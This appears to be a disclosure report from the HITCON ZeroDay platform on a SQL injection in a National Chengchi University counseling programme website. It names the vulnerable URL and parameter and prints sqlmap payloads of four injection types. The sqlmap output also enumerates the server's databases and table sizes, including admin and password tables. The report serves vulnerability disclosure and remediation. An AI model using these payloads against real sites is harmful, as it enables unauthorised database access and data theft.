Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00337
- 發信 Vendor: 國立政治大學
- Title: 国立政治大学某站SQL
- Introduction: 国立政治大学辅导与咨商硕士学位学程站点SQL
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2018/04/01 01:15:24 : 新提交 (由 Cra5h 更新此狀態)
- 2018/04/01 15:40:11 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/02 11:59:20 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/02 11:59:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/02 11:59:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/06/01 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00337
- 通報者:cra5h (Cra5h)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
国立政治大学辅导与咨商硕士学位学程站点SQL
SQL位置:
http://www.mpcg.nccu.edu.tw/newscontent.php?mn_no=203
mn_no参数过滤不严导致SQL产生
GET parameter 'mn_no' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
Parameter: mn_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mn_no=203 AND 9537=9537
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: mn_no=203 AND (SELECT 3068 FROM(SELECT COUNT(*),CONCAT(0x7178767671,(SELECT (ELT(3068=3068,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: mn_no=203 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: mn_no=-1076 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767671,0x47434a4f586866597a794c646a58554d697a5067476e765a43556e6647646a52526b42626a57784f,0x7178767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- EWMa[01:05:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[01:05:41] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mpcg.nccu.edu.tw'
确认影响库:(9个)
[01:06:06] [INFO] fetching database names
[01:06:07] [INFO] used SQL query returns 9 entries
[01:06:08] [INFO] retrieved: information_schema
[01:06:08] [INFO] retrieved: cdcol
[01:06:09] [INFO] retrieved: mpcg
[01:06:09] [INFO] retrieved: mysql
[01:06:09] [INFO] retrieved: performance_schema
[01:06:10] [INFO] retrieved: phpmyadmin
[01:06:10] [INFO] retrieved: test
[01:06:11] [INFO] retrieved: webauth
[01:06:11] [INFO] retrieved: wordpress
available databases [9]:
[] cdcol
[] information_schema
[] mpcg
[] mysql
[] performance_schema
[] phpmyadmin
[] test
[] webauth
[*] wordpress
[01:06:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mpcg.nccu.edu.tw'
查看数据量:
Database: cdcol
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cds | 3 |
+---------------------------------------+---------+
Database: phpmyadmin
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pma_userconfig | 1 |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+
Database: mpcg
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mpcg_news | 192 |
| user_data | 37 |
| mpcg_news_en | 11 |
| admin | 2 |
+---------------------------------------+---------+
Database: webauth
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| user_pwd | 1 |
+---------------------------------------+---------+
Database: wordpress
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| wp_options | 116 |
| wp_usermeta | 15 |
| wp_posts | 3 |
| wp_comments | 1 |
| wp_postmeta | 1 |
| wp_term_relationships | 1 |
| wp_term_taxonomy | 1 |
| wp_terms | 1 |
| wp_users | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| time_zone_transition | 117210 |
| time_zone_transition_type | 7716 |
| time_zone | 1685 |
| time_zone_name | 1685 |
| columns_priv | 29 |
| user | 9 |
| tables_priv | 4 |
| a | 3 |
| db | 3 |
| proc | 1 |
| proxies_priv | 1 |
| spider_temp_tab | 1 |
| temp_udf | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 938 |
| SESSION_VARIABLES | 328 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 310 |
| SESSION_STATUS | 310 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| USER_PRIVILEGES | 171 |
| STATISTICS | 133 |
| PARTITIONS | 111 |
| TABLES | 111 |
| KEY_COLUMN_USAGE | 96 |
| TABLE_CONSTRAINTS | 58 |
| CHARACTER_SETS | 39 |
| COLUMN_PRIVILEGES | 29 |
| SCHEMA_PRIVILEGES | 23 |
| PLUGINS | 20 |
| ENGINES | 9 |
| SCHEMATA | 9 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| TABLE_PRIVILEGES | 2 |
| INNODB_TRX | 1 |
| PROCESSLIST | 1 |
| ROUTINES | 1 |
+---------------------------------------+---------+
[01:11:00] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mpcg.nccu.edu.tw'
修補建議
过滤,参数化